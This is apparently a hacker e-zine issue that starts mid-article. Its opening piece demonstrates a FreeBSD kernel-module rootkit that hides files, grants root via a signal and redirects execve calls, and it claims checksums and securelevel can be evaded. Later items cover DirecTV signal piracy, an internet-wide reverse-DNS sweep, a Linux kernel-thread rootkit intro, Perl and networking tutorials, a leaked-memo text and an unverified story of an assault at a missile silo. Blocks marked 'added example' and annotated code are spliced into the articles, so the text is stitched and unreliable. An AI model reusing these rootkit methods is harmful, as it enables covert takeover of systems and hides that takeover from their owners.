majordomo@freebsd.org, reading all the kernel papers on www.freebsdzine.org
(GREAT! :) and reading lots of kernel code :)

-- H O W   U S E   M O Z A R E L A --

    # ls -l
    lrwxr-xr-x  1 root   wheel     12 Jan 27 18:38 @ -> /usr/include
    -rw-r--r--  1 root   wheel    157 Jan 26 16:24 Makefile
    -rw-r--r--  1 arkmp  arkmp   6214 Jan 29 15:26 arkmp.kv11
    -rw-r--r--  1 root   wheel   4447 Jan 27 21:32 mozarela.c
    -rwxr-xr-x  1 root   wheel   4937 Jan 27 21:32 mozarela.ko
    -rwxr-xr-x  1 root   wheel  24937 Jan 27 21:32 my_ls
    # mkdir ARK
    # mv my_ls ARK
    # ln -s /dev/a /home/arkmp/keen/ARK/my_ls
    # ls -l /dev/a
    lrwxr-xr-x  1 root   wheel     13 Jan 22 01:50 /dev/a -> /home/arkmp/keen/ARK/my_ls
    # kldload ./mozarela.ko
    mozarela loadated
    # ls -l
    lrwxr-xr-x  1 root   wheel     12 Jan 27 18:38 @ -> /usr/include
    -rw-r--r--  1 root   wheel    157 Jan 26 16:24 Makefile
    -rw-r--r--  1 arkmp  arkmp   6214 Jan 29 15:26 arkmp.kv11
    -rw-r--r--  1 root   wheel   4447 Jan 27 21:32 mozarela.c
    -rwxr-xr-x  1 root   wheel   4937 Jan 27 21:32 mozarela.ko

(and my ARK dir doesn't appear, because the my_ls trojan DOESN'T SHOW
files/dirs with ARK in the name, and /bin/ls isn't modified: its md5sum
appears intact, but it isn't what gets executed :)

    # ps axu
    [cut]
    root    203  0.0  6.0  2092 1240  ??  Is    2:19PM   0:03.43 telnetd
    arkmp   204  0.0  1.7   488  340  p0  Is    2:19PM   0:00.14 -csh (csh)
    arkmp   251  0.0  6.6  1588 1368  p0  I+    3:08PM   0:04.73 vi arkmp.kv11
    root    296  0.0  6.3  2092 1312  ??  Ss    4:11PM   0:00.24 telnetd
    arkmp   297  0.0  1.7   488  356  p1  Is    4:11PM   0:00.13 -csh (csh)
    root    314  0.0  1.7   480  348  p1  S     4:17PM   0:00.11 _su (csh)
    root      0  0.0  0.0     0    0  ??  DLs   2:01PM   0:00.01 (swapper)
    # cd \*CC
    *CC: No such file or directory.
    # kill -31 251
    # ps axu | grep vi
    root    251  0.0  6.6  1588 1368  p0  I+    3:08PM   0:04.94 vi arkmp.kv11
    #

and my session now has uid/gid euid/egid 0 :)

Why do I use a symbolic link? Because, to keep the kld small, my function for
redirecting execve contains the following code:

    static struct couple execred[3] = {
        { "/bin/ls","/dev/a" },
        { "/bin/su","/dev/b" },
        { "/bin/rm","/dev/c" }
    };
    int size =sizeof(execred) / sizeof(struct couple);

    while(size >= 0) {
        if(!strcmp(execred[--size].oldexec, uap->fname)) {
            memcpy(uap->fname, &execred[size].newexec,
                   sizeof(execred[size].newexec));
            uap->fname[sizeof(execred[size].newexec)+1]=0;
        }
    }

You can see that if the second name is bigger than the first name, the call

    memcpy(uap->fname, &execred[size].newexec, sizeof(execred[size].newexec));

can overflow the uap->fname buffer. Placing a symlink isn't a big problem: with
a trojan ls you can hide it in 3 seconds.

The Makefile:

------------------------------------------------- cut here -----------
SRCS   = mozarela.c
KMOD   = mozarela
KO     = mozarela.ko
KLDMOD = t
KERN   = /usr/src/sys/kern

.include
------------------------------------------------- cut here -----------

Any kld could have lots of implementations; I can't discuss them here. There
are lots of examples in the linux/freebsd/solaris kernel programming tutorials
from the THC group and lots of examples and studies from the s0ftpj group.
-- L A S T   W O R D   A B O U T   I N F I N I T E   W A R --

    crackers create rootkits, security men create md5sum
    crackers create execve redirection,
    security men create securelevel and syscall restoration

(Note that a file checksum like md5sum is defeated here not because the
binary changed but because the kernel did: the checker runs on the trojaned
kernel and only sees what the redirected syscalls let it see.)

securelevel is explained on various FreeBSD man pages, and syscall restoration
is explained in Pragmatic's paper. Syscall restoration IMHO can be fucked by
monitoring kldload() and kldfind() to DROP any module loaded after mozarela or
some other trojan in the kernel (not in another linked file!); securelevel can
be fucked with the spapem package coded by vecna (you may find info in the
README file in http://www.s0ftpj.org/tools/spapem.tar.gz).

That's all, for this time :)

[A Newbies Guide To Sockets in PERL]===================================[Beowulf]

Some of this was taken from "Perl in a Nutshell" by O'Reilly (and then
modified by me). I'm assuming you have programmed in Perl before, or maybe
just a little bit, because this is not a newbie's guide to Perl but to sockets
in Perl, so a small background in the language would be nice. This paper
contains a quick introduction to sockets, programming only the client side
(because I'm too lazy to do the server side). If you really want to make it
easy, use the IO::Socket module; at the end there is a quick little script
that tests ports from the client side to see if they are open. Feel free to
modify it, because it's pretty lazy coding, but it was late and I didn't have
a lot of time, so change it. Anyway, if you have any questions, email me at
chixdigUNIX@the-pentagon.com or talk to me on irc on Undernet under the name
beowulf. On with the tutorial!

First off you need to know what a socket does... I took this definition right
out of one of O'Reilly's books, so don't get mad at me if you don't like it...

"Sockets are the underlying mechanism for networking on the Internet. With
sockets, one application (a server) sits on a port waiting for connections.
Another application (the client) connects to that port and says hello; then
the client and server have a chat. Their actual conversation is done with
whatever protocol they choose - for example, a web client and server would
use HTTP, an email server would use POP3 and SMTP, etc. But at the most basic
level, you might say that all network programming comes down to opening a
socket, reading and writing data, and closing the socket again.

Sockets provide a connection between systems or applications. They can be
set up to handle streaming data or discrete data packets. Streaming data
continually comes and goes over a connection. A transport protocol like TCP
(Transmission Control Protocol) is used to process streaming data so that all
of the data is properly received and ordered. Packet-oriented communication
sends data across the network in discrete chunks. The message-oriented
protocol UDP (User Datagram Protocol) works on this type of connection.
Although streaming sockets using TCP are widely used for applications, UDP
sockets also have their uses.

Sockets exist in one of two address domains: the Internet domain and the Unix
domain. Sockets that are used for Internet connections require the careful
binding and assignment of the proper type of address dictated by the Internet
Protocol (IP). These sockets are referred to as Internet-domain sockets.
Sockets in the Unix domain create connections between applications either on
the same machine or within a LAN. The addressing scheme is less complicated,
often just providing the name of the target process."

Socket Functions in PERL

    socket   - Set up a socket and assign a filehandle to it
    connect  - Client side only: you guessed it, it connects to a socket
    recv     - Reads data from a filehandle
    send     - Writes data to a filehandle
    shutdown - Terminates a connection

How to set up a socket:

You need several arguments before you can set up a socket. The first is the
address domain: either PF_INET if you want to connect to an Internet address,
or PF_UNIX if you are connecting to a Unix domain address. Next you need the
argument for what type of connection you want to establish: if you want a
packet-based UDP connection you would use SOCK_DGRAM, or if you want a
streaming TCP connection you would use SOCK_STREAM. The next argument is the
protocol you want to use for the connection; you use getprotobyname for this.
And for the last part you're going to want that handy die command with the
error variable $!. So let's look at a typical way to set up a socket:

    use Socket;
    socket (BLAH, PF_INET, SOCK_STREAM, getprotobyname('tcp')) || die $!;

Ok, let's take a look at the arguments used... BLAH is the socket's
filehandle. PF_INET sets up a socket for an Internet address (PF_UNIX would
select the Unix domain instead), SOCK_STREAM specifies the streaming TCP
connection, getprotobyname sets the protocol to TCP, and then, of course, you
have the die command.

Client Side Programming:

For a client side program, after you set up the socket you need to connect to
a specific port with the connect command. Again you need arguments: the first
is the socket filehandle and the second is the address data structure. To
build it you need either the sockaddr_un function for Unix domain addresses or
the sockaddr_in function for Internet addresses. sockaddr_in needs more
arguments: the first is the port number, the second is an IP address or host
name packed with inet_aton. So let's say you want to connect to port 21 on the
server blah.com; it would look something like this:

    my $variable = sockaddr_in (21, inet_aton('blah.com'));
    connect (BLAH, $variable) || die $!;

If it does connect it returns a true value (i.e. 1); if it doesn't, die prints
the error message from the $! variable. Once connected you can do a number of
things, such as the send command, which sends data to the host, or the recv
command, which reads incoming data on the socket.
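As an added example that is not from this tutorial, here is a complete client built on the same Socket calls: it reports why a connect failed instead of just dying, reads the first banner line a service sends, and shuts the socket down. The host and port on the command line and the 5-second wait are the example's own assumptions.

```perl
#!/usr/bin/perl
# Added example (not the tutorial's code): socket/connect/recv/shutdown on
# the raw Socket API, with the connect error examined rather than died on.
use strict;
use warnings;
use Socket;
use Errno qw(ECONNREFUSED ETIMEDOUT);

# check_port(HOST, PORT, TIMEOUT) returns a pair:
#   ('open', banner) | ('closed', why) | ('filtered', why) | ('error', why)
sub check_port {
    my ($host, $port, $timeout) = @_;
    $timeout ||= 5;

    my $packed_ip = inet_aton($host)
        or return ('error', "cannot resolve $host");

    socket(my $sock, PF_INET, SOCK_STREAM, getprotobyname('tcp'))
        or return ('error', "socket: $!");

    # Same connect() the tutorial shows, but we look at $! when it fails:
    # ECONNREFUSED means the host answered with a reset (nothing listening),
    # ETIMEDOUT usually means a firewall silently dropped the SYN.
    unless (connect($sock, sockaddr_in($port, $packed_ip))) {
        my $err = $!;                     # dualvar copy: number and message
        close($sock);
        return ('closed',   'connection refused') if $err == ECONNREFUSED;
        return ('filtered', 'timed out')          if $err == ETIMEDOUT;
        return ('error',    "$err");
    }

    # Many services (SMTP, FTP, SSH) speak first; wait up to $timeout
    # seconds for that banner using four-argument select() on the handle.
    my $rin = '';
    vec($rin, fileno($sock), 1) = 1;
    my $banner = '';
    if (select($rin, undef, undef, $timeout) > 0) {
        recv($sock, $banner, 512, 0);
        $banner =~ s/\r?\n.*//s;          # keep only the first line
    }

    shutdown($sock, 2);                   # no more sends or receives
    close($sock);
    return ('open', $banner);
}

if (@ARGV >= 2) {
    my ($state, $detail) = check_port($ARGV[0], $ARGV[1], 5);
    print "$ARGV[0]:$ARGV[1] $state",
          ($detail ne '' ? " ($detail)" : ''), "\n";
} else {
    print "usage: $0 host port\n";
}
```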
After you are done using the socket you'll want to shut it down with the close
or shutdown command.

The IO::Socket module:

The IO::Socket module is included in the core of Perl and it makes life easier
for all you lazy programmers. Instead of using the above method, this module
makes it more object oriented. Here is an example of how to set up a socket:

    use IO::Socket;
    $blah = new IO::Socket::INET (PeerAddr => 'X.X.X.X',
                                  PeerPort => 23,
                                  Proto    => 'tcp');
    die "$!" unless $blah;

Ok, you can pretty much figure it out yourself: X.X.X.X is the IP or host name
of the server, PeerPort is obviously the port you want to connect to and Proto
is the protocol you want to use. There are other functions in the IO::Socket
module, but I'm too lazy to write them all out; you can get more info on them
at cpan.org.

Example of a badly written program to test ports without using the IO::Socket
module (connect is tested directly, so a closed port is reported instead of
killing the script):

    #!/usr/bin/perl

    use Socket;
    socket (BLAH, PF_INET, SOCK_STREAM, getprotobyname('tcp')) || die $!;

    print "Please enter the host you want to test\n";
    chomp($host = <STDIN>);
    print "please enter a port\n";
    chomp($port = <STDIN>);

    my $blah = sockaddr_in ($port, inet_aton("$host"));

    if (connect (BLAH, $blah)) {
        print "Port found\n";
    } else {
        print "Port not found for reason... $!\n";
    }

Ok, and now for one with the IO::Socket module:

    #!/usr/bin/perl

    use IO::Socket;

    print "Please enter the host you want to test\n";
    chomp($host = <STDIN>);
    print "please enter a port\n";
    chomp($port = <STDIN>);

    $blah = new IO::Socket::INET (PeerAddr => "$host",
                                  PeerPort => $port,
                                  Proto    => 'tcp');

    if ($blah) {
        print "Port found\n";
    } else {
        print "Port not found for reason... $!\n";
    }

Ok, well, that's it for the time being. If this makes it into KV then I will
write up another paper, this time on the server side. Hi to everyone I know on
irc. Later for now,

beowulf

[Curiosity killed the American Citizen]===============================[Firewa11]

The secret military. The nifty spy cameras. The homing devices.
Big brother looking down on us from above. The entire program waiting to crush
you the moment you might uncover the truth to any of their lies. Seems like
just a good movie you caught the other day, right? You've always known such a
program exists but you've never seen it for yourself. Well, I have. Here's what
happened:

I'm a curious, inquisitive person. I'm an engineer by career and an engineer
by home. I like to know how things work. A conversation with Digi sparked an
interest in missile silos. I looked at the ones for sale, which prompted me to
look at all abandoned missile silos. So, I started looking at all of the
abandoned silos from where I grew up. Wow, I only knew of the ones over by the
lake, never anywhere else. There were a lot of them. So, as I'm scoping it
out, I find a site that appears to be in really good shape. Great. I can
contact the owner of the land, and perhaps he will let me on the site to take
pictures. Maybe if it hasn't been sealed in, I can go down inside. Cool!

As I'm playing around on Terraserver, I'm looking at all of the stuff around
the area, and happened to come across something familiar. It's a site that
looks identical to the silos out by the lake, except this one isn't grown
over, and appears to have not been dismantled. Funny, it's not in my list of
former or current sites. Curiosity kicks into overdrive.

So, I go hang out with my parents for a day, and decide on my way home I'm
going to swing by those sites and see what I can see. The 'reality' voice in
my head is telling me that all that is going to happen is I'm going to meet
locked gates, nothing to see, and a waste of gas. Ok, sure. At least my
curiosity will have been calmed.

First site. It's the old one. The one that I have listed as abandoned. Yup,
the gate is locked and has a "Posted: No trespassing" sign in plain view. I
can see that the road is all but grown over, and trees have started to grow up
through the concrete on the pad. Definitely not in working order.
Ok, time to head back to the other site, and take a look.

Second site. This is the newer looking one. From my outdated pictures on
Terraserver, it looks to be a well-kept location, with structures that are
usually removed as soon as a site is decommissioned. Interesting. Anyway, I
pull up to the gate, roll down my window, and start taking pictures with my
good SLR camera. I don't want to switch lenses, but I can't quite make out
what the signs say, so I get out of the truck and go up to the gate and start
taking shots of the signs. The first sign says "Posted: No trespassing", and
the other I couldn't quite remember, but it listed stuff like an oil lease.
Nowhere did it say anything about a military installation or the like. The
signs were crudely fastened to an old chainlink fence that surrounded the
entire facility.

As I turn to leave, I hear a man ask what I was doing. I turned to look, and
the man was dressed in a pair of blue jeans and his shirt was a faded
long-sleeve cowboy style shirt. He had overgrown long hair and his smile
suggested many years without a toothbrush. He looked to be in his 30s. Anyway,
I told him I was doing some research on abandoned missile silos in the area
and came across this site. He asked if I wanted to come in and take a look
around, and of course I said yes. I ran back to my truck and grabbed another
roll of film and put it in my pocket, then followed him through the now open
gate.

To the left is the old abandoned gatehouse. It looks rusted down, and is
missing a door. Looks like some old cardboard boxes inside. Up ahead to the
left is an old house. Looks like it's been there quite a while. Basketball
goal in front of the driveway, and a bunch of kids' toys lying on the ground.

About 10 ft from the gate, as we're walking into the facility, out of nowhere
and without a sound, someone grabs me from behind.
At this point I'm wondering "what the fuck?", so as I get spun around I see a
man in camo reaching for my camera, so instinctively I hold it away. WHAM! I
get knocked in the gut, and my arms fold to protect my stomach and the camera
is pulled from my hands. The soldier, whose name I did mention to grab,
proceeds to open up my camera and pull the film from it, tearing it roughly
out. As I finally catch my breath from having the wind knocked out of me, he
throws the camera to me, which ends up falling down and landing on my feet.
Then he tells me to "Get in your truck and get gone". Which I comply with, no
questions asked. As he turns to leave I see the matte black M-16 strapped over
his shoulder, and the civilian guy glares at me as he too turns and walks up
to the house.

I throw my camera and the now-destroyed roll of film in the side seat and take
off. My hands were shaking so badly I couldn't even dial a number on my cell
phone, so I proceeded to chain smoke all the way back into town. After about a
pack of smokes and a Mountain Dew, I was good to go. I called and talked with
Digi, as well as others.

Reflections....

Ok, if something wanted to remain completely secret, they would not have come
out and opened the gate. With a closed gate and a normal enough looking house,
it could have been dismissed and I would have gone home. However, in a given
year, how many people actually come out and photograph gates of places they
find on Terraserver? Maybe these guys didn't know how to react. Or maybe they
did. Heh. Such possibilities there are when dealing with the unknown.

So my safest bet at this point is to file an official complaint with the base
commander for assault on a civilian. If that gets me nowhere, then I'm not
going to press further. I mean, I *could* call the cops, I could write my
congressman, I could jump up and down and scream bloody mary, but all that is
going to do is cause me to get buried.
So, I release this information to those whose conviction will be strengthened
by it. We all know these places exist. The signs are all around us. But not
until we are staring down the barrel of a few assault rifles do we realize the
real face behind the machine.

[Microsoft's OpenSource Policy]===============================[Elite Secret Spy]

Editor's Note: One of our elite security spies pulled this out of Microsoft
way back in January, but since we aren't as fast as we used to be, it's just
now making it in. Don't know if this has been published or not, don't care.

PROPER USE OF OPEN SOURCE SOFTWARE AT MICROSOFT

OSS includes a wide range of products distributed under a variety of licenses
such as the General Public License (GPL), Lesser General Public License
(LGPL), and Berkeley Software Distribution (BSD) license. If you are uncertain
whether software you intend to use is considered "open source", or the license
you plan to use will result in the software being treated as OSS, please check
with the Microsoft Manager to whom you are assigned.

Microsoft's goal with respect to the treatment of OSS is to avoid
inadvertently contributing our intellectual property to an open source effort.
The rules below are intended to protect valuable Microsoft intellectual
property and MUST be followed:

1. Do not incorporate OSS into MS products.

2. Do not contribute code to an open source project.

3. Do not review, modify or distribute OSS source code.

4. Other than OSS source code, it is okay to review other information about
   open source projects (e.g., architecture descriptions included in books,
   project descriptions provided at websites, development discussions
   conducted on the Internet, etc.), provided that you comply with any
   accompanying licenses or restrictions. If you have questions about the
   rules governing access to specific information, check with your Microsoft
   Manager to whom you are assigned.

5. You may run an OSS executable that is subject to the GNU General Public
   License (GPL) or any similar agreement, so long as the license or agreement
   does not require you to accept additional restrictions and/or obligations
   as a condition of running the software. If you have questions or concerns
   regarding the terms of a particular license or agreement, check with your
   Microsoft Manager to whom you are assigned.

6. For code that is developed, or otherwise owned by or licensed to MS, do not
   distribute or otherwise make the code available under an "open source"
   agreement.

These rules apply to all activities related to the business of Microsoft,
regardless of the time or location of such activities.

At times, you and the Microsoft Manager to whom you are assigned may reach the
preliminary conclusion that there is a sound business reason for taking an
action that is otherwise prohibited by the above general rules. In that event,
the Microsoft Manager will check with their LCA contact who will assess any
legal risks associated with the action and advise on the steps the Microsoft
Manager needs to take to obtain executive approval for the action. An
executive approval must be in place in order to deviate from the above rules.

If you have any questions or concerns regarding Microsoft's Open Source
Software (OSS) guidelines please contact the Microsoft Manager to whom you are
assigned or your agency or vendor employer contact.

[PERL Headache of the Issue]=====================================[Digital Ebola]

This issue's headache was provided by mercs. He wanted to take two lists,
compare them, take the differences, and compile them into a third, unique
list. Sounds quite easy, because it's Perl, right? Not quite: there are no
facilities to compare arrays (well, no EASY facilities). And true to Larry's
word, there was certainly more than one way to do it. Thanks to those that
helped, for helping me find a better way to do it than my original method.
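Before the script itself, an added example that is not the article's code: the same comparison done with hashes (the perlfaq4 approach), which treats the two lists as sets rather than comparing them position by position, so the result does not depend on line order and contains each element once. File names come from the command line as in the original.

```perl
#!/usr/bin/perl
# Added example (not Digital Ebola's comp.pl): two list files in, one file
# of the lines that appear in exactly one of them out. Lines are compared
# whole; blank and duplicate lines are collapsed.
use strict;
use warnings;

# Lines present in exactly one of the two lists, each reported once, sorted
# so the output is stable regardless of the input order.
sub symmetric_difference {
    my ($list1, $list2) = @_;
    my (%in1, %in2);
    $in1{$_}++ for @$list1;
    $in2{$_}++ for @$list2;
    my @only1 = grep { !$in2{$_} } sort keys %in1;   # in list 1, not in 2
    my @only2 = grep { !$in1{$_} } sort keys %in2;   # in list 2, not in 1
    return (@only1, @only2);
}

# Read a list file into an array reference, one element per line, trailing
# newline removed and blank lines skipped.
sub read_list {
    my ($file) = @_;
    open(my $fh, '<', $file) or die "Can't open $file: $!\n";
    chomp(my @lines = <$fh>);
    close($fh);
    return [ grep { length } @lines ];
}

die "Usage: comp.pl listfile listfile completelist\n" unless @ARGV == 3;

my ($file1, $file2, $file3) = @ARGV;
my @diff = symmetric_difference(read_list($file1), read_list($file2));

open(my $out, '>', $file3) or die "Can't open $file3: $!\n";
print $out "$_\n" for @diff;
close($out);
print scalar(@diff), " unique element(s) written to $file3\n";
```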
(Side note, mine was from perlfaq4, and the solution was ugly.)

    #!/usr/bin/perl
    #comp.pl - compares two lists, and combines them into a third unique
    #list with no matching elements. Written for mercs, by Digital Ebola.
    #Much thanks to super, who helped out with the array comparisons.
    #Digital Ebola - 5/11/2001

    my ($file1, $file2, $file3) = @ARGV;

    if (! @ARGV) {
        die "Usage: comp.pl listfile listfile completelist\n";
    }

    open(FILE1,$file1) or die "Can't open $file1: $!\n";
    open(FILE2,$file2) or die "Can't open $file2: $!\n";
    open(FILE3, ">$file3") or die "Can't open $file3: $!\n";

    @list1=<FILE1>;
    @list2=<FILE2>;

    print FILE3 @list2;

    # element $i of list1 is compared only with element $i of list2
    for(my $i=0; $i<@list1; $i++) {
        print FILE3 $list1[$i] if $list1[$i] ne $list2[$i];
    }

[Fun with XOSD]==================================================[Digital Ebola]

    /* xosd-tail.c by Digital Ebola */
    /* You must have xosd for this to work, get it at www.freshmeat.net */
    /* Greets to vac, teeceep, and super */

    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    #include "xosd.h"

    #define FONT "fixed"

    int main(void)
    {
        FILE *unf;
        char ack[170];
        xosd *osd;

        osd = xosd_init (FONT, "LawnGreen", 3, XOSD_top, 0);

        if((unf = fopen("syslog", "r"))!=NULL) {
            /* show one line of the file every 5 seconds on the display */
            while(fgets(ack,sizeof(ack),unf)!=NULL) {
                xosd_display (osd, 0, XOSD_string, ack);
                sleep(5);
            }
            fclose(unf);   /* only close what was actually opened */
        }

        xosd_uninit(osd);
        return EXIT_SUCCESS;
    }

[More PERL Madness]==============================================[Digital Ebola]

    #!/usr/bin/perl
    #GetHostByEverything by Digital Ebola

    use Socket;

    # results go to report.txt through a filehandle rather than through
    # system("/bin/echo ..."), so a hostname containing shell metacharacters
    # cannot run commands on the machine doing the lookups
    open(REPORT, ">>report.txt") or die "Can't open report.txt: $!\n";

    for($a=4;$a < 255;$a++) {
      for($b=1;$b < 255;$b++) {
        for($c=1;$c < 255;$c++) {
          for($d=1;$d < 255;$d++) {
            $iaddr = inet_aton("$a.$b.$c.$d");
            $name = gethostbyaddr($iaddr, AF_INET);
            $straddr = inet_ntoa($iaddr);
            #I'm lazy, shuddap.
            print REPORT "$name\n";
            print("\n$name\n");
            print REPORT "$straddr\n";
            print("$straddr\n");
            print REPORT "-------------------------\n";
            print("-------------------------\n");
          }
        }
      }
    }

    close(REPORT);

[CISCO PIX Connection Monitoring]====================================[DataShark]

I started this project because the PIX family of firewalls can handle a
"limited" amount of concurrent connections and it was causing problems for us.
My basic goal was to create an application to monitor PIX connections. I found
that it was easier to do with MRTG than to create a stand alone application,
so I set off into shell script land.

My first challenge was to find the OID that stores the current connections to
the PIX. After much searching and beating my head on my desk I was able to
find it.

    CURCON=`/bin/snmpwalk -m ALL "" .1.3.6.1.4.1.9.9.147.1.2.2.2.1.5 | grep -v End | grep -v 'enterprises.9.9.147.1.2.2.2.1.5.40.7' | awk -f /usr/local/mrtg-2/bin/proxy.awk`
    HICON=`/bin/snmpwalk -m ALL "" .1.3.6.1.4.1.9.9.147.1.2.2.2.1.5 | grep -v End | grep -v 'enterprises.9.9.147.1.2.2.2.1.5.40.6' | awk -f /usr/local/mrtg-2/bin/proxy.awk`
    echo $CURCON
    echo $HICON
    echo '[unknown]'
    echo pix

Ok, let's look at the script:

Line one, the CURCON line (forgive the word wrap): I use snmpwalk to gather
the correct information. The ".1.3.6.1.4.1.9.9.147.1.2.2.2.1.5" OID returns
two values, so I remove the one I do not need (the .40.7 row) and feed the
rest to awk. Line two is the same as line one except I am drawing out the high
connections (dropping the .40.6 row instead). Then I format it. MRTG accepts
its input in 4 lines:

Line one is the "bytes sent", or in our case the current connections.
Line two is the "bytes received", for us the high connections.
Line three is the uptime of the unit. If anyone wants to take the time to find
the uptime OID on the PIX please send it to me. :>
Line four is the name of the device being polled.
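As an added example, not DataShark's script, the same four MRTG lines produced in Perl: it parses snmpwalk's own output for the two rows of the connection-statistics OID (.40.6 current, .40.7 high-water) instead of relying on proxy.awk. It assumes the UCD-SNMP style argument order (host, then community) and runs on a constructed sample when no host is given.

```perl
#!/usr/bin/perl
# Added example (not the article's pix.sh): MRTG external script in Perl.
use strict;
use warnings;

my $CONN_OID = '.1.3.6.1.4.1.9.9.147.1.2.2.2.1.5';

# Pick the current (.40.6) and high-water (.40.7) rows out of snmpwalk
# output. Accepts the symbolic form "snmpwalk -m ALL" prints
# (enterprises.9.9.147....40.6 = 1342) and the numeric OID form, with or
# without a type tag such as "Gauge32:" before the number.
# Returns (current, high); either is undef if its row was not seen.
sub parse_pix_connections {
    my (@lines) = @_;
    my %val;
    for my $line (@lines) {
        if ($line =~ /9\.9\.147\.1\.2\.2\.2\.1\.5\.40\.([67])\s*=\s*(?:[A-Za-z0-9]+:\s*)?(\d+)\s*$/) {
            $val{$1} = $2;
        }
    }
    return ($val{6}, $val{7});
}

# The four lines MRTG expects from an external program: value one, value
# two, uptime (unknown here, as in the article) and the device name.
sub mrtg_lines {
    my ($cur, $high, $name) = @_;
    return ($cur, $high, '[unknown]', $name);
}

# Constructed sample of snmpwalk output (not captured from a real PIX),
# used when no host is given on the command line.
my @SAMPLE = (
    'enterprises.9.9.147.1.2.2.2.1.5.40.6 = 1342',
    'enterprises.9.9.147.1.2.2.2.1.5.40.7 = 4890',
    'End of MIB',
);

my @lines;
if (@ARGV >= 2) {
    my ($host, $community) = @ARGV;
    # List-form open: host and community are never passed through a shell,
    # so a stray quote or semicolon in the community string cannot run
    # commands on the poller. Argument order is an assumption (UCD-SNMP).
    open(my $snmp, '-|', '/bin/snmpwalk', '-m', 'ALL',
         $host, $community, $CONN_OID)
        or die "cannot run snmpwalk: $!\n";
    @lines = <$snmp>;
    close($snmp);
} else {
    @lines = @SAMPLE;
}

my ($cur, $high) = parse_pix_connections(@lines);
defined $cur && defined $high
    or die "connection counters not found in snmpwalk output\n";
print "$_\n" for mrtg_lines($cur, $high, 'pix');
```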
Next up, the MRTG configuration. This is pretty much your standard MRTG config
file (the HTML markup of the PageTop block was lost from the source text;
MRTG continuation lines start with a space):

    Title[^]: Response times for
    ShortLegend[_]: count
    Legend1[_]:
    Legend2[_]:
    Legend3[_]:
    Legend4[_]:
    LegendI[_]:
    LegendO[_]:
    YLegend[_]: Count
    Options[_]: noo, gauge, growright, nopercent
    MaxBytes[_]: 15000
    ImageDir: /var/www/html/mrtg
    LogDir: /var/www/html/mrtg/logs
    HtmlDir: /var/www/html/mrtg
    Refresh: 300
    Interval: 5
    RunAsDaemon: Yes

    Target[pixconn]: `/usr/local/mrtg-2/bin/pix.sh`
    MaxBytes[pixconn]: 1000000
    Options[pixconn]: noo, gauge, growright, nopercent
    Colours[pixconn]: PURPLE#660066,BLACK#000000,RED#cc0000,RED#cc0000
    Title[pixconn]: Pix Concurrent Connections
    PageTop[pixconn]:
     PIX Concurrent Connections
     System: PIX
     Description: PIX 515UR - Concurrent Connections
     Ip: 10.2.1.1
The only exceptions are the "Target" line, which is the name of the shell
script we just talked about, and the Options line: the "noo" option tells MRTG
not to graph the second line of the output from our script, and the gauge
option tells it to treat the numbers as what they are and not as incrementing
counters.

Look for a new version for RRDtool and some more trick Cisco stuff as I get
more time. Please submit requests, fixes, comments etc. to
crice@180096hotel.com.

/* For the html version of this article http://www.hcity.net/~nomad/pix.html */

[Poor Man's Boards]==================================================[BigGeezer]

I don't know if y'all have heard about the DirecTV stuff that has been going
on. Well... short and sweet: people have been hacking the DirecTV H-card for
some time now. They were finally able to stop the hacking about 3 months ago.
A few people use emulators to get free TV: circuit boards that plug into a
computer and into the DSS IRD to get a signal. (These aren't blocked, by the
way, so if you use emulators you still get free TV.) It takes making 2 circuit
boards. So I headed to the local Radio Shack and found out that it costs quite
a bit of money to make your own boards. That just wasn't going to do. So after
some investigation, and talking to a very *SMART* electronics engineer, I
found out how to do it cheaper, and have the equipment to make circuit boards
for anything. I'm not talking about the perf boards from Radio Shack; I am
talking printed circuit boards, just like you see in all electrical devices.

The focus of this article is Home Made Printed Circuit Boards.

The first thing you need is supplies... I know what you're thinking: "Here
comes the expensive part". You're right. But if you think a total investment
of $40 is expensive, you really should find another hobby anyway. Here we go,
the list:

 1. Bubble stone (the same size as CD cases; they are long and blue). You can
    find these at pet stores, in the aquatics section.
 2. 2 empty CD cases.
 3. Air pump (the same kind as for a fish aquarium), bought from a fish store.
 4. Tubing (should come with the air pump).
 5. Access to a laser printer.
 6. Labels (you need the backing).
 7. Muriatic acid, bought at any swimming pool store or Home Depot.
 8. Hydrogen peroxide, bought at Walmart for 87c for 1/4 gallon.
 9. Copper clad board, found at any electronics shop.
10. Silicone (found at Walmart auto parts).
11. A hot plate (the electrical kind; a skillet would do as well).
12. Fingernail polish remover (or acetone).

Putting it together:

1. Take the bubble stone and the 2 CD cases split apart.
2. Connect the CD cases around the bubble stone with silicone, around the part
   that produces the bubbles.
3. Take the air pump and connect it to the bubble stone.

There you go, you have your burner made. Simple, wasn't it?

Making the circuit boards:

Ok, you have your diagram of the circuit; print it out on the laser printer.
Take the back of a label, clean it with the fingernail polish remover, tape it
over the printed part of that copy and print it again, so the image is on the
slick part. Now put that aside for a bit. Turn your hot plate or skillet on;
you can tell it is hot enough if you spray some water on it and the water
beads up. Now tape the slick printed image face down onto the copper clad
board. Put the copper clad board on the hot plate with a towel or pot holder
laid on top, and a piece of wood on top of that, and press down for about 30
seconds. After the 30 seconds, remove the board from the hot surface and lay
it aside for a few minutes to cool down. Once it has cooled down, remove the
paper. It will leave a perfect image of the circuit on the copper clad board.

Now the burning process. Fill your burner with half and half muriatic acid and
peroxide. Turn your pump on so it is producing bubbles.
Put the copper clad board inside and watch the wonder of acid. As you are
watching, it will remove the copper around where the circuit was printed, but
will leave the printed part alone. After about 3 to 5 minutes the solution
will turn green from the dissolved copper and you can see it is almost done.
Once it is done, remove the board and rinse it off under the sink.

WHAMO! You have yourself a nice printed circuit board. Just drill your holes
where you want your connections and solder.

I have been using this a lot lately, making chip programmers, EEPROM burners,
servo boards, etc. I am in the process of making a frequency counter to use as
a bug detector, hehe. I will be taking pictures of how I did this and posting
them; I will get Digi to put the URL up on his site as soon as I get them
done.

[YAPOTTLK]=============================================================[Lawless]

Yet Another Paper On Trojaning The Linux Kernel

Typically when one thinks about kernel rootkits on Linux, the subject of
system call remapping comes up. This technique is tried and true; however, it
is also quite easy to detect. Several utilities are currently available to
handle these attacks, including LOMAC and my StMichael LKM. Moving beyond
simple system call remapping, information has been published about actually
rewriting some functions during the kernel's runtime. Again, this can be
detected easily by monitoring the values of the functions via a checksumming
mechanism; an example of detecting these attacks is available in
StMichael_LKM-0.04.

So, where to next? One area that has not been explored is the application of
kernel threads in the production of a kernel rootkit. Although one would not
have the easy access that system calls provide, since the kernel threads are
running in kernel space one can intercept, replace, or alter system activity
in ways that are undetectable.

But, for just a moment, let me digress.
+Kernel Threads+
----------------

